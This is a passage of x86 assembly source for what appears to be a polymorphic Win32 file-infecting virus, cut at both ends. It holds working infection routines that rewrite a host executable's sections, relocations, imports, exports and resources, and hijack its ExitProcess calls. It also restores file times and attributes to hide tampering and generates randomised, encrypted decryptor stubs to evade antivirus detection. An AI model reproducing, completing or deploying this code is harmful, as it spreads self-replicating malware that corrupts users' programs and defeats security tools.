sub ecx, 4
or ecx, ecx
jnz @@LoopEncryptCode
xor eax, eax
mov [edi], eax
@@Exit: mov ebx, [ebp+HeaderAddress]
call Random
and eax, 0FFFFFCh
mov [ebx+58h], eax
xor edi, edi
jmp @@NoError
@@Error4: call UndoChanges
mov edi, 1
@@NoError: push eax
push ecx
push edx
mov eax, [ebp+MappingAddress]
push eax
call dword ptr [ebp+RVA_UnmapViewOfFile]
pop edx
pop ecx
pop eax
jmp @@NoError3
@@Error3: mov edi, 1
@@NoError3:
push eax
push ecx
push edx
mov eax, [ebp+hMapping]
push eax
call dword ptr [ebp+RVA_CloseHandle]
pop edx
pop ecx
pop eax
jmp @@NoError2
@@Error2: mov edi, 1
@@NoError2:
push eax
push ecx
push edx
xor eax, eax
push eax
push eax
or edi, edi
jnz @@ThereWasAnError
mov eax, [ebp+FileSize]
jmp @@FixSize
@@ThereWasAnError:
mov eax, [ebp+OriginalFileSize]
@@FixSize: push eax
mov eax, [ebp+hFile]
push eax
call dword ptr [ebp+RVA_SetFilePointer]
pop edx
pop ecx
pop eax
push eax
push ecx
push edx
mov eax, [ebp+hFile]
push eax
call dword ptr [ebp+RVA_SetEndOfFile]
pop edx
pop ecx
pop eax
@@DontFixSize:
push eax
push ecx
push edx
mov eax, [ebp+FindFileData]
add eax, 14h
push eax
sub eax, 8
push eax
sub eax, 8
push eax
mov eax, [ebp+hFile]
push eax
call dword ptr [ebp+RVA_SetFileTime]
pop edx
pop ecx
pop eax
push eax
push ecx
push edx
mov eax, [ebp+hFile]
push eax
call dword ptr [ebp+RVA_CloseHandle]
pop edx
pop ecx
pop eax
@@Error: push eax
push ecx
push edx
mov eax, [ebp+FileAttributes]
push eax
mov eax, [ebp+Addr_FilePath]
push eax
call dword ptr [ebp+RVA_SetFileAttributesA]
pop edx
pop ecx
pop eax
@@Error_: ret
TouchFile endp
UpdateArrayOfRVAs proc
or eax, eax
jz @@UpdateArray_OK
or edx, edx
jz @@UpdateArray_OK
push ebx
mov ebx, eax
call TranslateVirtualToPhysical
mov eax, ebx
pop ebx
or eax, eax
jz @@UpdateArray_Updated01
@@UpdateArrayLoop_01:
cmp [eax], edi
jb @@UpdateArray_Updated01
add [eax], ecx
@@UpdateArray_Updated01:
add eax, 4
dec edx
or edx, edx
jnz @@UpdateArrayLoop_01
@@UpdateArray_OK:
ret
UpdateArrayOfRVAs endp
UpdateHeaders proc
push ecx
mov eax, [ebp+MakingFirstHole]
or eax, eax
jz @@MakingDataHole
mov eax, [esi+10h]
cmp eax, [esi+08h]
jbe @@TextSizeOK
mov [esi+08h], eax
@@TextSizeOK:
mov edi, [esi+0Ch]
add edi, [esi+10h]
push edi
mov eax, [esi+14h]
add eax, [esi+10h]
push eax
jmp @@BeginUpdates
@@MakingDataHole:
mov edi, [esi+0Ch]
push edi
mov eax, [esi+14h]
push eax
@@BeginUpdates:
@@UpdateResources:
mov eax, [ebp+HeaderAddress]
mov ebx, [eax+88h]
or ebx, ebx
jz @@UpdateImports
call TranslateVirtualToPhysical
or ebx, ebx
jz @@End
mov eax, [ebx+0Ch]
and eax, 0FFFFh
mov edx, [ebx+0Eh]
and edx, 0FFFFh
add edx, eax
or edx, edx
jz @@UpdateImports
mov eax, ebx
add eax, 10h
call UpdateResourceDir
@@UpdateImports:
call UpdateImports
mov eax, [ebp+GetModuleHandleAddress]
or eax, eax
jz @@End
mov eax, [ebp+GetProcAddressAddress]
or eax, eax
jz @@End
mov eax, [ebp+ExitProcessAddress]
or eax, eax
jz @@End
@@UpdateExports:
mov eax, [ebp+HeaderAddress]
mov ebx, [eax+78h]
or ebx, ebx
jz @@ExportsUpdated
call TranslateVirtualToPhysical
or ebx, ebx
jz @@ExportsUpdated
mov eax, [ebx+0Ch]
cmp eax, edi
jb @@UpdateExportsOK_01
add [ebx+0Ch], ecx
@@UpdateExportsOK_01:
mov eax, [ebx+1Ch]
mov edx, [ebx+14h]
call UpdateArrayOfRVAs
mov eax, [ebx+1Ch]
cmp eax, edi
jb @@UpdateExportsOK_02
add [ebx+1Ch], ecx
@@UpdateExportsOK_02:
mov eax, [ebx+20h]
mov edx, [ebx+18h]
call UpdateArrayOfRVAs
mov eax, [ebx+20h]
cmp eax, edi
jb @@UpdateExportsOK_03
add [ebx+20h], ecx
@@UpdateExportsOK_03:
@@ExportsUpdated:
@@UpdateCodeSection:
push esi
mov eax, [ebp+RelocHeader]
mov eax, [eax+14h]
add eax, [ebp+MappingAddress]
@@LoopUpdate_00:
mov esi, [eax]
or esi, esi
jz @@AllUpdated
mov edx, 8
@@LoopUpdate_01:
cmp edx, [eax+4]
jae @@PageUpdated
add eax, edx
mov ebx, [eax]
sub eax, edx
and ebx, 0FFFFh
add edx, 2
cmp ebx, 2FFFh
jbe @@LoopUpdate_01
and ebx, 0FFFh
add ebx, [eax]
mov esi, [ebp+MakingFirstHole]
or esi, esi
jnz @@UpdateCodeSec_Cont00
cmp ebx, [ebp+RVA_TextHole]
jb @@UpdateCodeSec_Cont00
add ebx, [ebp+TextHoleSize]
@@UpdateCodeSec_Cont00:
call TranslateVirtualToPhysical
or ebx, ebx
jz @@LoopUpdate_01
push eax
push edx
mov eax, [ebp+HeaderAddress]
mov edx, [ebx]
sub edx, [eax+34h]
cmp edx, edi
jb @@TranslateOK_02
add [ebx], ecx
add edx, ecx
@@TranslateOK_02:
mov esi, [ebx-2]
and esi, 0FFFFh
cmp esi, 15FFh
jz @@CheckExitProcess
cmp esi, 25FFh
jnz @@ItsNotExitProcess
@@CheckExitProcess:
cmp edx, [ebp+ExitProcessAddress]
jnz @@ItsNotExitProcess
mov edx, [ebp+HeaderAddress]
mov edx, [edx+34h]
add edx, edi
push esi
mov esi, ebx
call PatchExitProcess
pop esi
xor eax, eax
pop edx
pop eax
push eax
add eax, edx
push edx
mov edx, [eax-2]
and edx, 0FFFF0000h
mov [eax-2], edx
pop edx
pop eax
jmp @@LoopUpdate_01
@@ItsNotExitProcess:
@@TranslateOK:
pop edx
pop eax
jmp @@LoopUpdate_01
@@PageUpdated:
add eax, [eax+4]
jmp @@LoopUpdate_00
@@AllUpdated:
pop esi
mov eax, [ebp+MakingFirstHole]
mov ebx, [ebp+HeaderAddress]
cmp [ebx+0Ch], edi
jb @@Fixed_01
or eax, eax
jnz @@NotFixed_01
cmp [ebx+0Ch], edi
jz @@Fixed_01
@@NotFixed_01:
add [ebx+0Ch], ecx
@@Fixed_01:
cmp [ebx+28h], edi
jb @@Fixed_02
or eax, eax
jnz @@NotFixed_02
cmp [ebx+28h], edi
jz @@Fixed_02
@@NotFixed_02:
add [ebx+28h], ecx
@@Fixed_02:
cmp [ebx+2Ch], edi
jb @@Fixed_03
or eax, eax
jnz @@NotFixed_03
cmp [ebx+2Ch], edi
jz @@Fixed_03
@@NotFixed_03:
add [ebx+2Ch], ecx
@@Fixed_03:
cmp [ebx+30h], edi
jb @@Fixed_04
or eax, eax
jnz @@NotFixed_04
cmp [ebx+30h], edi
jz @@Fixed_04
@@NotFixed_04:
add [ebx+30h], ecx
@@Fixed_04:
add [ebx+50h], ecx
mov edx, [ebp+HeaderAddress]
mov edx, [edx+74h]
mov ebx, [ebp+HeaderAddress]
add ebx, 78h
xor eax, eax
@@LoopDir_01:
cmp eax, 4
jz @@NextDir_01
cmp [ebx], edi
jb @@NextDir_01
add [ebx], ecx
@@NextDir_01:
add ebx, 8
inc eax
dec edx
or edx, edx
jnz @@LoopDir_01
mov edx, [ebp+StartOfSectionHeaders]
mov ebx, [esi+14h]
mov eax, [ebp+MakingFirstHole]
or eax, eax
jz @@MakingDataHole_2
@@MakingCodeHole_2:
add ebx, [esi+10h]
@@MakingDataHole_2:
mov eax, [ebp+HeaderAddress]
mov eax, [eax+6]
and eax, 0FFFFh
push esi
mov esi, [ebp+MakingFirstHole]
@@LoopUpdate_02:
push eax
mov eax, [edx+14h]
cmp eax, ebx
jb @@NextSection_00
or esi, esi
jnz @@NextSection_00_
cmp eax, ebx
jz @@NextSection_00
@@NextSection_00_:
add eax, ecx
mov [edx+14h], eax
@@NextSection_00:
mov eax, [edx+0Ch]
cmp eax, edi
jb @@NextSection_01
or esi, esi
jnz @@NextSection_01_
cmp eax, edi
jz @@NextSection_01
@@NextSection_01_:
add eax, ecx
mov [edx+0Ch], eax
@@NextSection_01:
pop eax
add edx, 28h
dec eax
or eax, eax
jnz @@LoopUpdate_02
pop esi
add [esi+08h], ecx
add [esi+10h], ecx
cmp esi, [ebp+RelocHeader]
jz @@End
push ecx
push ebx
mov edx, [ebp+MappingAddress]
add edx, [ebp+FileSize]
sub edx, 4
mov edi, edx
add edi, ecx
pop ecx
add ecx, [ebp+MappingAddress]
@@Again: mov eax, [edx]
mov [edi], eax
sub edx, 4
sub edi, 4
cmp edx, ecx
jae @@Again
pop ecx
and ecx, 0FFFFFFFCh
shr ecx, 2
add edx, 4
@@Again2: call Random
and eax, 0FCh
mov [edx], eax
add edx, 4
dec ecx
or ecx, ecx
jnz @@Again2
@@End: pop eax
pop edi
mov ecx, 0
pop ecx
ret
UpdateHeaders endp
UpdateResourceDir proc
@@UpdateResourceDir2:
push eax
mov eax, [eax+4]
and eax, 80000000h
or eax, eax
jz @@UpdateData
pop eax
push eax
mov eax, [eax+4]
and eax, 7FFFFFFFh
add eax, ebx
push edx
push eax
mov edx, [eax+0Ch]
and edx, 0FFFFh
mov eax, [eax+0Eh]
and eax, 0FFFFh
add edx, eax
pop eax
add eax, 10h
call @@UpdateResourceDir2
pop edx
jmp @@NextDir
@@UpdateData:
pop eax
push eax
mov eax, [eax+4]
add eax, ebx
mov eax, [eax]
cmp eax, edi
jb @@UpdateOK
pop eax
push eax
mov eax, [eax+4]
add eax, ebx
push ebx
mov ebx, eax
call AddUndoAction
pop ebx
add [eax], ecx
@@UpdateOK:
@@NextDir: pop eax
add eax, 8
dec edx
or edx, edx
jnz @@UpdateResourceDir2
ret
UpdateResourceDir endp
TranslateVirtualToPhysical proc
push ecx
or ebx, ebx
jz @@Error
mov ecx, [ebp+HeaderAddress]
mov ecx, [ecx+6]
and ecx, 0FFFFh
push edx
mov edx, [ebp+StartOfSectionHeaders]
push eax
@@LoopSection:
mov eax, [edx+0Ch]
cmp ebx, eax
jb @@NextSection
add eax, [edx+10h]
cmp ebx, eax
jae @@NextSection
sub ebx, [edx+0Ch]
add ebx, [edx+14h]
pop eax
pop edx
add ebx, [ebp+MappingAddress]
pop ecx
ret
@@NextSection:
add edx, 28h
dec ecx
or ecx, ecx
jnz @@LoopSection
pop eax
pop edx
@@Error: xor ebx, ebx
pop ecx
ret
TranslateVirtualToPhysical endp
UpdateImports proc
push esi
mov eax, [ebp+HeaderAddress]
mov ebx, [eax+80h]
or ebx, ebx
jz @@ImportsUpdated
call TranslateVirtualToPhysical
or ebx, ebx
jz @@ImportsUpdated
@@UpdateImports_Loop00:
mov eax, [ebx+0Ch]
or eax, eax
jz @@ImportsUpdated
cmp eax, edi
jb @@UpdateImportsOK_01
add ebx, 0Ch
call AddUndoAction
add [ebx], ecx
sub ebx, 0Ch
@@UpdateImportsOK_01:
push ebx
xor ebx, ebx
mov [ebp+Kernel32Imports], ebx
mov ebx, eax
call TranslateVirtualToPhysical
or ebx, ebx
jz @@UpdateImports_Next00
mov eax, [ebx]
and eax, 1F1F1F1Fh
cmp eax, 'nrek' AND 1F1F1F1Fh
jnz @@UpdateImports_Next00
mov eax, [ebx+4]
and eax, 0FFFF1F1Fh
cmp eax, '23le' AND 0FFFF1F1Fh
jnz @@UpdateImports_Next00
mov eax, 1
mov [ebp+Kernel32Imports], eax
@@UpdateImports_Next00:
pop ebx
mov eax, [ebx]
or eax, eax
jz @@UpdateImportsOK_04
push ebx
mov ebx, eax
call TranslateVirtualToPhysical
mov eax, ebx
pop ebx
or eax, eax
jz @@UpdateImportsOK_04
@@UpdateImports_Loop01:
mov edx, [eax]
or edx, edx
jz @@UpdateImportsOK_02
cmp edx, 80000000h
jae @@UpdateImports_UpdatedOK
mov esi, [ebp+Kernel32Imports]
or esi, esi
jz @@UpdateImports_NotKernel32
push ebx
mov ebx, edx
call TranslateVirtualToPhysical
or ebx, ebx
jz @@UpdateImports_UnknownFunction
mov esi, [ebx+2]
cmp esi, 'tixE'
jz @@UpdateImports_ExitProcess00
cmp esi, 'MteG'
jz @@UpdateImports_GetModuleHandle00
cmp esi, 'PteG'
jz @@UpdateImports_GetProcAddress00
cmp esi, 'triV'
jnz @@UpdateImports_UnknownFunction
@@UpdateImports_VirtualAlloc:
mov esi, [ebx+0Bh]
cmp esi, 'loc'
jnz @@UpdateImports_UnknownFunction
xor esi, esi
jmp @@UpdateImports_SaveFunctionAddress
@@UpdateImports_GetProcAddress00:
mov esi, [ebx+6]
cmp esi, 'Acor'
jnz @@UpdateImports_UnknownFunction
mov esi, 1
jmp @@UpdateImports_SaveFunctionAddress
@@UpdateImports_ExitProcess00:
mov esi, [ebx+6]
cmp esi, 'corP'
jnz @@UpdateImports_UnknownFunction
mov esi, 2
jmp @@UpdateImports_SaveFunctionAddress
@@UpdateImports_GetModuleHandle00:
mov esi, [ebx+0Ah]
cmp esi, 'naHe'
jnz @@UpdateImports_UnknownFunction
mov esi, [ebx+0Eh]
cmp esi, 'Aeld'
jz @@UpdateImports_GetModuleHandleAFound
cmp esi, 'Weld'
jnz @@UpdateImports_UnknownFunction
mov esi, 1
jmp @@UpdateImports_GetModuleHandleFound
@@UpdateImports_GetModuleHandleAFound:
xor esi, esi
@@UpdateImports_GetModuleHandleFound:
mov [ebp+GetModuleHandleMode], esi
mov esi, 3
@@UpdateImports_SaveFunctionAddress:
pop ebx
push ebx
push eax
push ebx
mov ebx, [ebx]
call TranslateVirtualToPhysical
sub eax, ebx
pop ebx
add eax, [ebx+10h]
cmp eax, edi
jb @@UpdateImports_SetFunctionAddress
add eax, ecx
@@UpdateImports_SetFunctionAddress:
or esi, esi
jz @@UpdateImports_SetVirtualAlloc
cmp esi, 1
jz @@UpdateImports_SetGetProcAddress
cmp esi, 2
jz @@UpdateImports_SetExitProcess
@@UpdateImports_SetGetModuleHandle:
mov [ebp+GetModuleHandleAddress], eax
jmp @@UpdateImports_FunctionSet
@@UpdateImports_SetVirtualAlloc:
mov [ebp+VirtualAllocAddress], eax
jmp @@UpdateImports_FunctionSet
@@UpdateImports_SetGetProcAddress:
mov [ebp+GetProcAddressAddress], eax
jmp @@UpdateImports_FunctionSet
@@UpdateImports_SetExitProcess:
mov [ebp+ExitProcessAddress], eax
@@UpdateImports_FunctionSet:
pop eax
@@UpdateImports_UnknownFunction:
@@UpdateImports_Continue00:
pop ebx
@@UpdateImports_NotKernel32:
cmp edx, edi
jb @@UpdateImports_UpdatedOK
push ebx
mov ebx, eax
call AddUndoAction
pop ebx
add [eax], ecx
@@UpdateImports_UpdatedOK:
add eax, 4
jmp @@UpdateImports_Loop01
@@UpdateImportsOK_02:
mov eax, [ebx]
cmp eax, edi
jb @@UpdateImportsOK_03
call AddUndoAction
add [ebx], ecx
@@UpdateImportsOK_03:
add ebx, 10h
mov eax, [ebx]
cmp eax, edi
jb @@UpdateImportsOK_04_
call AddUndoAction
add eax, ecx
mov [ebx], eax
sub eax, ecx
@@UpdateImportsOK_04_:
sub ebx, 10h
@@UpdateImportsOK_04:
add ebx, 14h
jmp @@UpdateImports_Loop00
@@ImportsUpdated:
pop esi
ret
UpdateImports endp
PatchExitProcess proc
push eax
mov eax, 1
call Random
and eax, 1
jz @@PUSHRET
@@IndirectDisplacement:
push ecx
mov eax, [ebp+TextHeader]
mov ecx, [eax+10h]
mov eax, [eax+14h]
add eax, [ebp+MappingAddress]
push edx
sub ecx, 4
@@LoopFindHole:
sub ecx, 1
or ecx, ecx
jz @@NotFound
mov edx, [eax]
cmp edx, 0CCCCCCCCh
jz @@HoleFound
add eax, 1
jmp @@LoopFindHole
@@NotFound:
pop edx
pop ecx
jmp @@PUSHRET
@@HoleFound:
pop edx
mov [eax], edx
mov ecx, [esi+4]
and ecx, 0FFh
cmp ecx, 0C3h
jz @@RetInserted
sub eax, [ebp+MappingAddress]
mov ecx, [ebp+TextHeader]
sub eax, [ecx+14h]
add eax, [ecx+0Ch]
mov ecx, [ebp+HeaderAddress]
add eax, [ecx+34h]
mov [esi], eax
mov eax, 25h
mov [esi-1], al
pop ecx
jmp @@Return
@@RetInserted:
mov eax, 35h
mov [esi-1], al
pop ecx
jmp @@Return
@@PUSHRET:
mov eax, 68h
mov [esi-2], eax
mov [esi-1], edx
mov eax, 0C3h
mov [esi+3], al
@@Return: pop eax
ret
PatchExitProcess endp
AddUndoAction proc
push edx
mov edx, [ebp+MakingFirstHole]
or edx, edx
jz @@Return
push eax
mov edx, [ebp+NumberOfUndoActions]
add edx, [ebp+OtherBuffers]
mov [edx], ebx
mov eax, [ebx]
mov [edx+4], eax
add edx, 8
sub edx, [ebp+OtherBuffers]
mov [ebp+NumberOfUndoActions], edx
pop eax
@@Return: pop edx
ret
AddUndoAction endp
UndoChanges proc
mov edx, [ebp+NumberOfUndoActions]
or edx, edx
jz @@Ret
mov ecx, edx
sub edx, 8
add edx, [ebp+OtherBuffers]
@@Loop01:
mov ebx, [edx]
mov eax, [edx+4]
mov [ebx], eax
sub edx, 8
sub ecx, 8
or ecx, ecx
jnz @@Loop01
@@Ret: ret
UndoChanges endp
APICall_GetModuleHandle proc
mov eax, [ebp+FlagAorW]
or eax, eax
jz @@UseGMHA
mov ebx, edx
add ebx, 20h
mov ebx, edx
add ecx, 10h
@@LoopConvertToWideChar:
mov eax, [ecx]
and eax, 0FFh
mov [ebx], eax
sub ecx, 1
sub ebx, 2
cmp ecx, edx
jnz @@LoopConvertToWideChar
@@UseGMHA: push edx
call dword ptr [ebp+RVA_GetModuleHandle]
mov [ebp+ReturnValue], eax
ret
APICall_GetModuleHandle endp
GetFunction proc
push eax
push ecx
push edx
mov eax, edx
push eax
mov eax, edi
push eax
call dword ptr [ebp+RVA_GetProcAddress]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
ret
GetFunction endp
;----------------------------------------------------------------------------------------
MakeDecryptor proc
mov [ebp+InstructionTable], edi
xor eax, eax
mov [ebp+NumberOfLabels], eax
mov [ebp+NumberOfVariables], eax
mov eax, edi
add eax, 80000h
mov [ebp+ExpansionResult], eax
mov eax, [ebp+RVA_DataHole]
mov ecx, [ebp+HeaderAddress]
add eax, [ecx+34h]
mov [ebp+StartOfEncryptedData], eax
mov edx, [ebp+RelocHeader]
or edx, edx
jnz @@SetDataAtEndOfCryptedCode
mov ecx, [ebp+DataHeader]
mov edx, [ebp+HeaderAddress]
call Random
and eax, 0Fh
add eax, [ecx+0Ch]
add eax, [edx+34h]
jmp @@SetDecryptorDataSection
@@SetDataAtEndOfCryptedCode:
add eax, [ebp+SizeOfNewCode]
and eax, 0FFFFFFFCh
add eax, 4
@@SetDecryptorDataSection:
mov [ebp+Decryptor_DATA_SECTION], eax
mov eax, 1
mov [ebp+CreatingADecryptor], eax
call Poly_MakeRandomExecution
mov eax, [ebp+VirtualAllocAddress]
or eax, eax
jnz @@VirtualAllocAlreadyImported
mov eax, [ebp+GetModuleHandleMode]
or eax, eax
jnz @@GetModuleHandleUNICODE
@@GetModuleHandleASCII:
call Random
and eax, 20202020h
add eax, 'NREK'
mov [ebp+Poly_FirstPartOfFunction], eax
call Random
and eax, 00002020h
add eax, '23LE'
mov [ebp+Poly_SecondPartOfFunction], eax
mov eax, 2
call Random
and eax, 1
jz @@DontSetExtension0
call Random
and eax, 20202000h
add eax, 'LLD.'
@@DontSetExtension0:
mov [ebp+Poly_ThirdPartOfFunction], eax
xor eax, eax
mov [ebp+AdditionToBuffer], eax
call Poly_SetFunctionName
jmp @@NameOfModuleInitialized
@@GetModuleHandleUNICODE:
call Random
and eax, 00200020h
add eax, 0045004Bh
mov [ebp+Poly_FirstPartOfFunction], eax
call Random
and eax, 00200020h
add eax, 004E0052h
mov [ebp+Poly_SecondPartOfFunction], eax
call Random
and eax, 00200020h
add eax, 004C0045h
mov [ebp+Poly_ThirdPartOfFunction], eax
xor eax, eax
mov [ebp+AdditionToBuffer], eax
call Poly_SetFunctionName
mov eax, 00320033h
mov [ebp+Poly_FirstPartOfFunction], eax
mov eax, 2
call Random
and eax, 1
jz @@DontSetExtension1
call Random
and eax, 00200000h
add eax, 0044002Eh
@@DontSetExtension1:
mov [ebp+Poly_SecondPartOfFunction], eax
or eax, eax
jz @@DontSetExtension2
call Random
and eax, 00200020h
add eax, 004C004Ch
@@DontSetExtension2:
mov [ebp+Poly_ThirdPartOfFunction], eax
mov eax, 0Ch
mov [ebp+AdditionToBuffer], eax
call Poly_SetFunctionName
@@NameOfModuleInitialized:
call Poly_SelectThreeRegisters
mov edx, [ebp+Decryptor_DATA_SECTION]
mov ecx, [ebp+BufferRegister]
call Poly_DoMOVRegValue
mov ecx, [ebp+BufferRegister]
call Poly_DoPUSHReg
mov ecx, [ebp+GetModuleHandleAddress]
call Poly_DoCALLMem
mov eax, 0F6h
mov [edi], eax
mov eax, 0808h
mov [edi+1], eax
mov eax, [ebp+Decryptor_DATA_SECTION]
add eax, 10h
mov [edi+3], eax
add edi, 10h
mov eax, 'triV'
mov [ebp+Poly_FirstPartOfFunction], eax
mov eax, 'Alau'
mov [ebp+Poly_SecondPartOfFunction], eax
mov eax, 'coll'
mov [ebp+Poly_ThirdPartOfFunction], eax
xor eax, eax
mov [ebp+AdditionToBuffer], eax
call Poly_SetFunctionName
call Poly_SelectThreeRegisters
mov edx, [ebp+Decryptor_DATA_SECTION]
mov ecx, [ebp+BufferRegister]
call Poly_DoMOVRegValue
mov ecx, [ebp+BufferRegister]
call Poly_DoPUSHReg
call Poly_SelectThreeRegisters
mov ecx, [ebp+IndexRegister]
mov ebx, 10h
call Poly_DoMOVRegMem
mov ecx, [ebp+IndexRegister]
call Poly_DoPUSHReg
mov ecx, [ebp+GetProcAddressAddress]
call Poly_DoCALLMem
mov eax, 0F6h
mov [edi], eax
mov eax, 0808h
mov [edi+1], eax
mov eax, [ebp+Decryptor_DATA_SECTION]
add eax, 10h
mov [edi+3], eax
add edi, 10h
mov [ebp+VirtualAllocAddress], eax
@@VirtualAllocAlreadyImported:
mov eax, 8
mov [ebp+BufferRegister], eax
mov [ebp+CounterRegister], eax
mov [ebp+IndexRegister], eax
mov edx, 4
call Poly_DoPUSHValue
mov edx, 1000h
call Poly_DoPUSHValue
call Random
and eax, 01F000h
mov edx, 350000h
add edx, eax
call Poly_DoPUSHValue
xor edx, edx
call Poly_DoPUSHValue
mov ecx, [ebp+VirtualAllocAddress]
call Poly_DoCALLMem
mov eax, 0F6h
mov [edi], eax
mov eax, 0808h
mov [edi+1], eax
mov eax, [ebp+Decryptor_DATA_SECTION]
mov [edi+3], eax
add edi, 10h
call Poly_SelectThreeRegisters
mov ecx, [ebp+IndexRegister]
xor ebx, ebx
call Poly_DoMOVRegMem
mov ecx, [ebp+IndexRegister]
call Poly_MakeCheckWith0
mov eax, 74h
mov [edi], eax
mov [ebp+Poly_Jump_ErrorInVirtualAlloc], edi
add edi, 10h
mov ecx, [ebp+IndexRegister]
mov edx, [ebp+New_CODE_SECTION]
call Poly_DoADDRegValue
mov ecx, [ebp+IndexRegister]
mov ebx, 10h
call Poly_DoMOVMemReg
call Random
and eax, 0FC000000h
mov edx, [ebp+New_DISASM2_SECTION]
add edx, eax
call Poly_DoPUSHValue
call Random
and eax, 0FC000000h
mov edx, [ebp+New_DATA_SECTION]
add edx, eax
call Poly_DoPUSHValue
call Random
and eax, 0FC000000h
mov edx, [ebp+New_BUFFERS_SECTION]
add edx, eax
call Poly_DoPUSHValue
call Random
and eax, 0FC000000h
mov edx, [ebp+New_DISASM_SECTION]
add edx, eax
call Poly_DoPUSHValue
call Random
and eax, 0FC000000h
mov edx, [ebp+New_CODE_SECTION]
add edx, eax
call Poly_DoPUSHValue
mov edx, [ebp+GetProcAddressAddress]
call Poly_DoPUSHValue
mov edx, [ebp+GetModuleHandleAddress]
call Poly_DoPUSHValue
mov edx, [ebp+TranslatedDeltaRegister]
shl edx, 1
mov eax, [ebp+GetModuleHandleMode]
add edx, eax
call Poly_DoPUSHValue
call Random
mov ebx, [ebp+SizeOfNewCodeP2]
sub ebx, 4
and eax, ebx
mov [ebp+Poly_InitialValue], eax
mov [ebp+CounterValue], eax
call Random
sub ebx, 4
and eax, ebx
mov [ebp+Poly_Addition], eax
call Random
mov ebx, [ebp+SizeOfNewCodeP2]
sub ebx, 4
and eax, ebx
mov [ebp+IndexValue], eax
call Random
mov [ebp+BufferValue], eax
call Poly_SelectThreeRegisters
call Poly_SetValueToRegisters
call Poly_InsertLabel
mov [ebp+Poly_LoopLabel], eax
mov ecx, [ebp+IndexRegister]
call Poly_DoPUSHReg
mov ecx, [ebp+IndexRegister]
mov edx, [ebp+CounterRegister]
call Poly_DoXORRegReg
mov eax, 38h
mov [edi], eax
mov eax, [ebp+IndexRegister]
mov [edi+1], eax
mov eax, [ebp+SizeOfNewCode]
and eax, 0FFFFFFFCh
add eax, 4
mov [edi+7], eax
add edi, 10h
mov eax, 73h
mov [edi], eax
mov [ebp+Poly_ExcessJumpInstruction], edi
add edi, 10h
mov eax, 42h
mov [edi], eax
mov eax, [ebp+IndexRegister]
add eax, 0800h
mov [edi+1], eax
mov eax, [ebp+StartOfEncryptedData]
mov [edi+3], eax
mov eax, [ebp+BufferRegister]
mov [edi+7], eax
add edi, 10h
mov eax, 3
call Random
and eax, 7
jz @@NoEncryption
call Random
@@NoEncryption:
mov [ebp+EncryptionKey], eax
mov ecx, eax
or ecx, ecx
jz @@DontMakeDecryption
xor eax, eax
call Random
and eax, 1
jz @@MethodXOR_prev
mov eax, 1
call Random
and eax, 1
jz @@MethodXOR_prev
jmp @@SetMethod
@@MethodXOR_prev:
mov eax, 2
@@SetMethod:
mov [ebp+TypeOfEncryption], eax
mov ecx, [ebp+EncryptionKey]
or eax, eax
jz @@MethodADD
cmp eax, 1
jz @@MethodSUB
@@MethodXOR:
mov eax, 30h
jmp @@MakeDecryption
@@MethodADD:
neg ecx
@@MethodSUB:
xor eax, eax
@@MakeDecryption:
mov [edi], eax
mov eax, [ebp+BufferRegister]
mov [edi+1], eax
mov [edi+7], ecx
add edi, 10h
@@DontMakeDecryption:
mov eax, 02h
mov [edi], eax
mov eax, 0808h
mov [edi+1], eax
mov eax, [ebp+Decryptor_DATA_SECTION]
add eax, 10h
mov [edi+3], eax
mov eax, [ebp+IndexRegister]
mov [edi+7], eax
add edi, 10h
mov eax, 43h
mov [edi], eax
mov eax, [ebp+IndexRegister]
add eax, 0800h
mov [edi+1], eax
xor eax, eax
mov [edi+3], eax
mov eax, [ebp+BufferRegister]
mov [edi+7], eax
add edi, 10h
call Poly_InsertLabel
mov ebx, [ebp+Poly_ExcessJumpInstruction]
mov [ebx+1], eax
mov ecx, [ebp+IndexRegister]
call Poly_DoPOPReg
call Random
and eax, 1
jz @@AddIndexFirst
@@AddCounterFirst:
call Poly_ModifyCounter
@@C_SelectAnotherSequence:
call Random
and eax, 3
or eax, eax
jz @@C_SelectAnotherSequence
push eax
cmp eax, 1
jnz @@AddCounterFirst_Next00
call Poly_MaskCounter
@@AddCounterFirst_Next00:
call Poly_ModifyIndex
pop eax
push eax
cmp eax, 2
jnz @@AddCounterFirst_Next01
call Poly_MaskCounter
@@AddCounterFirst_Next01:
call Poly_MaskIndex
pop eax
cmp eax, 3
jnz @@AddCounterFirst_Next02
call Poly_MaskCounter
@@AddCounterFirst_Next02:
jmp @@ModificationMade
@@AddIndexFirst:
call Poly_ModifyIndex
@@I_SelectAnotherSequence:
call Random
and eax, 3
or eax, eax
jz @@I_SelectAnotherSequence
push eax
cmp eax, 1
jnz @@AddIndexFirst_Next00
call Poly_MaskIndex
@@AddIndexFirst_Next00:
call Poly_ModifyCounter
pop eax
push eax
cmp eax, 2
jnz @@AddIndexFirst_Next01
call Poly_MaskIndex
@@AddIndexFirst_Next01:
call Poly_MaskCounter
pop eax
cmp eax, 3
jnz @@AddIndexFirst_Next02
call Poly_MaskIndex
@@AddIndexFirst_Next02:
@@ModificationMade:
mov eax, 38h
mov [edi], eax
mov eax, [ebp+CounterRegister]
mov [edi+1], eax
mov eax, [ebp+Poly_InitialValue]
mov [edi+7], eax
add edi, 10h
mov eax, 75h
mov [edi], eax
mov eax, [ebp+Poly_LoopLabel]
mov [edi+1], eax
add edi, 10h
mov eax, 8
mov [ebp+CounterRegister], eax
mov [ebp+BufferRegister], eax
mov ecx, [ebp+DeltaRegister]
mov [ebp+IndexRegister], ecx
xor ebx, ebx
call Poly_DoMOVRegMem
mov ecx, [ebp+Decryptor_DATA_SECTION]
add ecx, 10h
call Poly_DoCALLMem
call Poly_InsertLabel
mov edx, [ebp+Poly_Jump_ErrorInVirtualAlloc]
mov [edx+1], eax
mov edx, [ebp+Poly_JumpRandomExecution]
or edx, edx
jz @@DontSetJump
mov [edx+1], eax
@@DontSetJump:
call Poly_SelectThreeRegisters
xor edx, edx
call Poly_DoPUSHValue
mov ecx, [ebp+ExitProcessAddress]
call Poly_DoCALLMem
mov ebx, [ebp+VarMarksTable]
mov ecx, 2000h
xor eax, eax
@@LoopClearMarks:
mov [ebx], eax
add ebx, 4
sub ecx, 4
or ecx, ecx
jnz @@LoopClearMarks
mov [ebp+AddressOfLastInstruction], edi
mov eax, [ebp+OtherBuffers]
mov [ebp+JumpsTable], eax
add eax, 8000h
mov [ebp+FramesTable], eax
mov eax, [ebp+NewAssembledCode]
push eax
mov eax, [ebp+TranslatedDeltaRegister]
push eax
call XpandCode
mov eax, [ebp+InstructionTable]
mov [ebp+NewAssembledCode], eax
mov eax, [ebp+ExpansionResult]
